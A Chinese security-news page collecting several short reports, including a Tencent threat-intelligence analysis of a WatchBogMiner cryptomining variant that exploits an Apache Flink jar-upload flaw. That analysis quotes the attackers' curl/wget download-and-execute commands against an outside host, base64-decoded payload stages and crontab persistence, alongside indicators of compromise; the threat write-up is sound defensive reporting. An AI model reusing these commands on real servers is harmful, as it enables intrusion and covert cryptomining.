分类: 网络安全

安全专家发现链接预览会泄漏敏感数据

链接预览几乎是主流聊天和即时信息应用中标配的功能,它能预览链接中关联的图像和文本,从而让在线对话更加轻松。但遗憾的是,它们还可能会泄漏我们的敏感数据、消耗我们有限的带宽、耗尽我们的电池,甚至在某些情况下能够暴露原本应该端到端加密的聊天内容。根据本周一发布的研究,目前 Facebook,Instagram,LinkedIn 和 Line 中的信息就存在这样的问题。 当发送者发送了一条包含链接的信息,应用可能会显示该链接随附的文本(通常是标题)和图像,通常看起来会是下面这样的: 为此,应用程序本身(或由应用程序指定的代理)必须要先访问该链接,打开文件,并调查其中的内容。而在这个过程中可能会下载恶意程序。其他形式的恶意行为可能会迫使应用下载太大的文件,以至于导致应用崩溃,耗尽电池或消耗有限的带宽。而且,如果链接指向私人材料(例如,将报税表发布到私人OneDrive或DropBox帐户),则应用服务器可以无限期查看和存储它。 本周一,安全研究人员塔拉尔·哈吉·巴克里(Talal Haj Bakry)和汤米·迈斯克(Tommy Mysk)发现,Facebook Messenger 和 Instagram 在方面的表现比较糟糕。如下图所示,两个应用程序都会下载并复制整个链接文件,即使文件大小为千兆字节也是如此。同样,如果文件是用户希望保密的文件,则可能会引起关注。 即使链接的文件容量高达 2.6 GB,在 Facebook Messenger 和 Instagram 两款应用中发送链接预览之后依然会进行下载。 Haj Bakry 和 Mysk 向Facebook报告了他们的发现,该公司表示这两个应用程序都可以正常工作。 Instagram 的所有者 Facebook 在一封电子邮件中说,其服务器仅下载图像的缩小版本,而不下载原始文件,并且该公司不存储该数据。 但是 Mysk 表示,该视频演示了 Instagram 全部下载了 2.6GB 文件(Ubuntu ISO,文件重命名为ubuntu.png )。他还指出,大多数其他 Messenger 会剥离 JavaScript,而不是下载并在其服务器上运行。LinkedIn的表现略好。唯一的区别是,它没有复制任何大小的文件,而是仅复制了前50兆字节。 同时,当 Line 应用程序打开加密消息并找到链接时,它似乎会将链接发送到 Line 服务器以生成预览。Haj Bakry 和 Mysk 写道:“我们认为这违反了端到端加密的目的,因为LINE服务器知道通过应用程序发送的所有链接,以及谁与谁共享链接。” Discord,Google Hangouts,Slack,Twitter和Zoom也会复制文件,但它们将数据量限制在15MB到50MB之间。上图提供了研究中每个应用程序的比较。     (消息来源:cnBeta;封面来自网络)  

腾讯主机安全(云镜)捕获 WatchBogMiner 挖矿木马新变种,利用 Apache Flink 漏洞攻击云主机

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/zviLvGK3wTnl0iwtszHQlg   一、概述 腾讯主机安全(云镜)捕获WatchBogMiner挖矿木马最新变种对云主机的攻击,该变种利用Apache Flink任意Jar包上传导致远程代码执行漏洞入侵云主机,然后下载文件名为“watohdog”的门罗币挖矿木马。 该挖矿木马最初的版本是针对Linux服务器利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击。根据其最初下载的挖矿木马文件名,将其命名为“Watchbog”挖矿木马。 腾讯安全近期检测到“Watchbog”挖矿木马的最新变种开始利用Redis未授权访问漏洞、Apache Flink远程代码执行漏洞入侵传播,根据其算力推测,该变种已控制约8000台服务器挖矿,挖矿收益折合人民币约1.2万元。 腾讯安全系列产品应对WatchBogMiner最新变种的响应清单如下: 应用场景 安全产品 解决方案  威胁情报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)WatchBogMiner黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)WatchBogMiner黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持检测: 1)WatchBogMiner关联的IOCs; 2)Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)  ; 3)Supervisord远程命令执行漏洞(CVE-2017-11610); 4)ThinkPHP远程命令执行漏洞; 5)Apache FLink未授权上传jar包远程代码执行漏洞; 6)Redis未授权访问漏洞。   有关云防火墙的更多信息,可参考:https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 腾讯主机安全(云镜)已支持检测: 1)WatchBogMiner相关木马程序; 2)Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ; 3)Supervisord远程命令执行漏洞(CVE-2017-11610); 4)ThinkPHP远程命令执行漏洞; 5)Apache FLink未授权上传jar包远程代码执行漏洞; 6)Redis未授权访问漏洞。   腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 腾讯御界基于网络流量进行威胁检测,已支持检测: 1)Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ; 2)Supervisord远程命令执行漏洞(CVE-2017-11610); 3)ThinkPHP远程命令执行漏洞; 4)Apache FLink未授权上传jar包远程代码执行漏洞; 5)Redis未授权访问漏洞。   关于T-Sec高级威胁检测系统的更多信息,可参考:https://cloud.tencent.com/product/nta 二、详细分析 Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Apache Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 2019年11月Aapche Flink被爆出漏洞,攻击者可直接在Apache Flink中上传任意jar包,从而达到远程代码执行的目的。漏洞POC代码已被公开:https://github.com/LandGrey/flink-unauth-rce 攻击者首先利用Flink漏洞上传恶意jar包: 然后执行远程命令: /bin/bash -c (curl -s http[:]//nabladigital.biz/img/ddxox.png||wget -q -O- http[:]//nabladigital.biz/img/ddxox.png)|bash 其中ddxox.png代码: nohup bash -c '(curl -fsSL http[:]//nabladigital.biz/img/sghbw.png||wget -q -O- http[:]//nabladigital.biz/img/sghbw.png)|bash' > /dev/null 2>&1 &rm -rf /tmp/seele* sghbw.png代码: (curl -fsSL http[:]//nabladigital.biz/img/afhpo.png||wget -q -O - http[:]//nabladigital.biz/img/afhpo.png)|base64 -d|bash 最终执行的afhpo.png首先定义三个变量house、park、room house=http[:]//nabladigital.biz/img/ddxox.png park= https[:]//files.catbox.moe/5j9zcz room= https[:]//a.pomf.cat/wariie 然后crontab命令创建定时任务,每10分钟下载执行一次以上脚本: (crontab -l 2>/dev/null; echo "*/10 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O- $park||curl -fsSLk $room||wget -q -O- $room)|bash > /dev/null 2>&1")| crontab – 通过写入以下文件创建定时任务: /etc/cron.d/root /etc/cron.d/system /etc/cron.d/apache /var/spool/cron/crontabs/root /var/spool/cron/root 接着下载挖矿木马http[:]//nabladigital.biz/img/qczgb.png,base64解码后保存至目录/tmp/systemd-private-64aa0008dfb47a84a96f7974811b772f-systemd-timesyncd.service-TffNff/tmp/watohdog(之前的版本,该文件名为watchbog)。 watohdog是XMRig经过修改编译的挖矿程序。 矿池:104.140.201.42:3333 钱包: 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd 收益:已挖矿获得门罗币13.82XMR,折合人民币约1.2万元。平均算力103 KH/s,以此推算Watchbog最新变种已控制约8000台服务器挖矿。 IOCs Domain nabladigital.biz URL http[:]//nabladigital.biz/img/ddxox.png http[:]//nabladigital.biz/img/sghbw.png http[:]//nabladigital.biz/img/afhpo.png http[:]//nabladigital.biz/img/qczgb.png https[:]//files.catbox.moe/5j9zcz https[:]//a.pomf.cat/wariie MD5 Watohdog 1df8307ae2d2524628b1322ac864d96c ddxox.png 791e8ecf4dee71dd0e0da129b938258f sghbw.png ef5323cac300f68fb77ac23c39236bf2 afhpo.png 9ef94e8b41893c4b1a85c327a3bcae3f 钱包: 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd 参考链接: 1. Apache Flink任意Jar包上传导致远程代码执行 https://mp.weixin.qq.com/s/ArYCF4jjhy6nkY4ypib-Ag 2. Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现 https://cloud.tencent.com/developer/article/1544254 (封面来自网络)

诺基亚发布威胁报告:当前 33% 的物联网设备受到感染

在诺基亚最新发布的《Threat Intelligence Report》中,表示由于在安全方面存在的诸多隐患,导致与互联网连接设备日益受到攻击威胁。该报告称,目前物联网设备感染率达到了 33%,高于 2019 年的 16%。 根据该报告,受影响最大的物联网设备是那些常规分配给公众的互联网IP地址的设备。它强调指出,由于网络扫描看不到易受攻击的设备,因此使用运营商级网络地址转换的网络看到 IoT 设备的感染率大大降低。 诺基亚软件总裁兼首席数字官Bhaskar Gorti在评论报告中的发现时说:“ 5G 生态系统中正在发生的巨大变化,随着到 2021 年在全球范围内部署更多5G网络,为恶意行为者利用物联网设备中的漏洞提供了充足的机会。该报告不仅增强了消费者和企业加强自身网络保护实践的迫切需求,而且还对物联网设备生产商提供了更高需求。”     (消息来源:cnBeta; 封面来自网络)

跨国犯罪团伙 QQAAZZ 多个成员被指控提供洗钱服务

本周,跨国网络犯罪集团 QQAAZZ 的 20 名成员分别在美国、葡萄牙、西班牙和英国被指控为恶意软件提供洗钱服务。 逮捕行动是由欧洲刑警组织协调开展的前所未有的国际执法行动,行动代号为 2BaGoldMule。行动涉及 16 个国家,警方在拉脱维亚、保加利亚、英国、西班牙和意大利进行了 40 多次房屋搜查。警方还查封了与 QQAAZZ 组织相关的,位于保加利亚的比特币挖矿业务。根据执法机构的说法,该团伙为多种恶意软件运营提供服务,包括 Dridex、GozNym 和 Trickbot。 从 2016 年开始,QQAAZZ 组织试图帮助全球最主要的网络犯罪分子,洗白从受害者那里窃取的数千万美元赃款。“QQAAZZ 团伙成员主要由来自拉脱维亚、保加利亚、罗马尼亚和比利时的成员组成,他们在世界各地的金融机构开设并维护了数百个公司和个人银行账户,以接收来自网络犯罪分子从受害者处窃取的资金” ,“然后,资金会被转移到其他由 QQAAZZ 控制的银行帐户中,有时也会使用旨在隐藏资金原始来源的 ‘tumbling’ 服务将其转换为加密货币。在收取高达 50% 的洗白费用后,QQAAZZ 组织将攻击者所盗取资金的余额返还给攻击者 客户。” QQAAZZ 组织在多个讲俄语的在线网络犯罪论坛上,将其服务称为“全球同业存款服务”。 该组织成员使用即时消息传递应用程序指导其客户如何将被盗资金转移到他们控制下的银行帐户中。该组织使用伪造的合法波兰和保加利亚的身份开设了银行帐户。QQAAZZ 还利用数十家空壳公司开设其他银行帐户。洗钱活动涉及到全世界金融机构的数百个公司和个人银行帐户。 欧洲刑警组织欧洲网络犯罪中心负责人 EdvardasŠileris 表示:“网络犯罪分子正在不断探索滥用技术和金融的可能性,从而在一瞬间使世界各地的数百万用户受害”,“今天的行动表明,通过适当的执法国际协调,我们可以对付这些罪犯,并将他们绳之以法”。     (消息来源:SecurityAffaris;译文来源:FreeBuf.COM;封面来自网络。)

网络钓鱼邮件诱饵从 COVID-19 主题转移到美国大选

KnowBe4安全研究人员发现,以选举为主题的信息不断增加,涉及美国总统健康到 民主党全国委员会,再到冒充美国选举援助委员会 (EAC)。这些信息冒充选民注册页面,试图收集个人资料(PII)。我们将在文中详细介绍研究人员识别出的相关凭证和网络钓鱼工具包。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1372/       消息来源:proofpoint ,封面来源于网络,译者:小江; 本文由 HackerNews.cc 翻译整理; 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Linux 5.9.1 以及部分旧版稳定内核已解决 “Bleeding Tooth”漏洞问题

Linux 5.9正式发布刚过去一周,修正版本的内核5.9.1就已经跟随而来,让这个稳定版本更值得关注的是包括了本周被Google与英特尔的安全人员公开及警告的”Bleeding Tooth”蓝牙漏洞的修复。BleedingTooth是一个影响Linux的远程代码执行漏洞,源于L2CAP代码中基于堆的类型混乱。 但总的来说,它并不像其他一些漏洞那样紧迫,因为它首先依赖于攻击者在易受攻击系统的蓝牙范围内,依赖于一些错综复杂的细节,攻击者才能发送一个流氓L2CAP数据包,导致BlueZ蓝牙协议栈内的远程代码执行。 当然,如果攻击者的条件全部都具备的话,那么这个漏洞是非常危险的,因为在最严重的情况下可能导致远程代码执行。 BleedingTooth现在已经在Linux 5.9.1的内核代码中通过蓝牙修复的形式来解决,所以5.9.1的发布公告特别点出了蓝牙修复,以及其它常规的改进。 与此同时,对于那些旧版本稳定内核,例如5.8.16, 5.4.72, 4.19.152, 4.14.202, 4.9.240以及4.4.240都已经带来了”Bleeding Tooth”蓝牙漏洞的修复内容。       (稿源及图片来源:cnBeta)  

微软已修复 Windows 安装过程中的权限提升安全漏洞

在Windows Setup中存在一个安全漏洞,即安装操作系统功能更新时的过程中可使得经过本地认证的攻击者有可能利用提升的系统权限运行任意代码。该漏洞(CVE-2020-16908)可被利用来安装软件、创建新用户账户或干扰数据。 该漏洞是在Windows Setup处理目录的方式中发现的,微软表示,它影响到Windows 10的1803、1809、1903、1909和2004版本。不过微软表示系统只有在升级到新功能更新的过程中才容易受到攻击,其他时间都不会受到影响。现在功能更新捆绑包已经提供打了补丁后的Setup二进制文件,该漏洞已经 “不复存在”。 这个漏洞只存在于Windows 10 Setup中,当客户从以前的Windows 10版本升级到较新的版本(例如,从Windows 10版本1909升级到Windows 10版本2004)时,Windows 10 Setup都会暂时运行。只有在升级到较新版本的Windows时,设备才会出现漏洞。如果您正在使用WSUS或MEM ConfigMgr或其他第三方管理工具,请同步最新的功能更新捆绑,并批准这些部署。如果您使用的是Windows媒体,根据系统的适用性,请从VLSC或Visual Studio订阅版(原MSDN)下载最新的刷新媒体,或下载最新的适用的Setup动态更新(DU)包,并为您现有的媒体打上补丁。 您可以从 Microsoft 更新目录网站下载最新的设置动态更新 (DU) 包。可以在以下地址找到: 4582759 — Windows 10 Version 1803 4582760 — Windows 10 Version 1809 4579919 — Windows 10 Version 1903 4579919 — Windows 10 Version 1909 4579308 — Windows 10 Version 2004 了解更多: MISC:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16908 URL:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16908     (稿源:cnBeta;封面来自网络)

欧盟起草“打击名单” 大型科技公司将面临更严格的监管

欧盟希望进一步打击科技巨头已经不是秘密,他们可能会用一份简单的短名单来决定哪些公司面临新的限制。《金融时报》消息称,欧盟正在起草一份涉及多达20家大型科技公司的 “打击名单”,这些公司将面临比小型竞争对手更严厉的监管,比如强制数据共享和提高透明度的要求。该名单的制定基于市场份额、用户数以及他人对其平台的依赖性等标准。 不过目前谁在名单上还暂不清楚。不过,据信它非常以美国为中心,很可能包括亚马逊、苹果、Facebook和谷歌等知名重量级企业。这很可能无助于缓解欧盟与美国现任领导层的紧张关系,但事实上这又与美国众议院小组委员会的调查相吻合,该调查指责这些公司同样掌握着需要监管的垄断权力。 全面改革欧盟互联网监管的《数字服务法案》提案将于12月初提交,但目前还不能确定名单是否会同时准备好。 无论时间如何,目标都将保持不变。据报道,欧盟希望不仅仅是打算对科技公司进行罚款,而是想办法让这些公司迅速改变自己的行为,无论是开放竞争的通道,甚至是强迫它们拆分。理论上,这将会给当事企业施加压力,让它们在原本会推脱惩罚的地方改过自新。       (稿件及图片来源:cnbeta)

Silent Librarian APT 组织将在 20/21 学年持续攻击大学

前言 自复学以来,被称为“Silent Librarian/ TA407 / COBALT DICKENS”的APT组织就一直通过网络钓鱼活动瞄准大学。 9月中旬,一位客户告知我们该APT组织开展的一项新的网络钓鱼活动。基于目标受害者数量庞大,我们得知,APT组织不局限于特定国家,而是试图扩大其覆盖范围。 …… 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1370/     消息来源:malwarebytes  ,图片来源网络,译者:小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。    

印度在 Covid-19 期间网络攻击激增

COVID-19不仅会对健康、社会和经济造成危害,而且会引发网络安全危机。这一流行病给企业在远程协作和业务连续性领域带来了新的挑战。 随着远程工作越来越多,员工们使用了大量的互联网工具。由于企业和人们开始越来越依赖技术,并忙于与流行病作斗争,攻击者现在比以往任何时候都有更多的选择来攻击他们。 根据PWC的4月报告,印度公司面临的安全威胁在2020年3月翻了一番,更令人担忧的是,从2020年1月17日到20日,安全威胁的数量增加了100%。 印度联邦电子与信息技术国务部长Sanjay Dhotre表示,印度第二季度发生的网络攻击超过35万次,是2020年第一季度记录事件数量的三倍。他还强调,截止到2020年8月,一共发生70万起网络安全事件。 数字网络安全危机 ACRONIS Cyber Readiness 2020年报告显示,全球31%的公司每天至少面临一次网络安全事件。然而,印度每天报告的网络攻击次数是以前的两倍,其中大多数网络攻击包括网络钓鱼、DDoS、视频会议、利用弱服务和恶意软件。 网络钓鱼活动是最令人担忧的攻击,因为它们在这场流行病期间达到了顶峰。尽管恶意软件的数量较少,但在印度,它仍然是一个更为严重的问题——报告的恶意软件问题几乎是全球平均水平的2倍。 此外,在接受调查的组织中,有39%经历了视频会议攻击。其中,印度、加拿大、瑞士和英国是受影响最大的国家。 以冠状病毒为主题的网络钓鱼电子邮件和声称有关COVID-19的有用信息的恶意网站已成为了最大威胁。此外,根据Seqrite的报告,从2020年4月至6月,共发现40万起新的勒索软件攻击。 这些网络攻击大多是通过利用易受攻击的服务获得对远程系统的访问进行的。 为什么印度容易遭受网络攻击? NITI Aayog报告指出,原因是越来越多地使用互联网和移动技术。印度在全球互联网用户数量排名第三,仅次于美国和中国。随着互联网和手机用户的指数级增长,印度和全球的网络攻击事件数量显著上升。 内部安全威胁被忽略。企业更注重通过无缝操作保证业务连续性,而不是弥合远程基础架构中的缺口。如果敏感数据在不同部门之间流动,而没有适当的监视和记录过程,那么在发生任何攻击时识别漏洞就变得很困难。 外部威胁增加。随着不断增加的外部威胁,只有少数印度公司采取了网络应用防火墙等安全措施来监控外部威胁,并在网络攻击事件发生时及时阻止。 远程工作期间暴露出弱点。远程工作期间暴露的主要弱点包括身份验证技术薄弱、监控不足和暴露的服务器(DNS、VPN、RDP等)。 此外,许多员工通常忽视个人网络安全。在这种“work from anywhere culture”的文化下,员工开始在自己的官方机器上访问自己的个人电子邮件和社交媒体网站。总的来说,随着个人和工作生活的在线融合,网络攻击很容易通过不安全的个人帐户发生。 缺少云技术方面的专业知识也是问题所在。为了确保从任何设备和任何地方访问数据的方便性,许多公司都采用了云技术。然而,他们没有足够的内部资源来管理和保护APIs, SaaS或containers。越来越多的低配置云架构将不可避免地为攻击者打开大门。 保护措施 以下是一些安全提示: 1.对员工进行安全原则培训。 2.对于通过电子邮件收到的附件、链接或文本,尤其是与COVID-19相关的主题行,要谨慎 构建的远程工作策略。 3.仅使用可信来源,如从合法网站获取最新信息。 4.不要在陌生人的电子邮件或电话中透露你的财务或个人信息。 5.鼓励只为公务目的使用办公设备。 6.不要在不同的帐户和应用程序之间重复使用密码。 7.进行数据备份并单独存储。 8.使用多因素身份验证。 9.使用基于云的WAF(如AppTrana)使堆栈现代化,AppTrana是下一代网络安全保护套件,包括漏洞评估、虚拟补丁、零误报、DDoS攻击防范和其他功能。 在网络安全领域,下一代威胁监测工具和预测分析超越了基于规则的系统,可以检测网络风险,从而以安全、快速的方式标记潜在威胁。有了足够的全国性的网络安全意识和强有力的政策,企业才能够在未来有效地应对网络威胁。     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。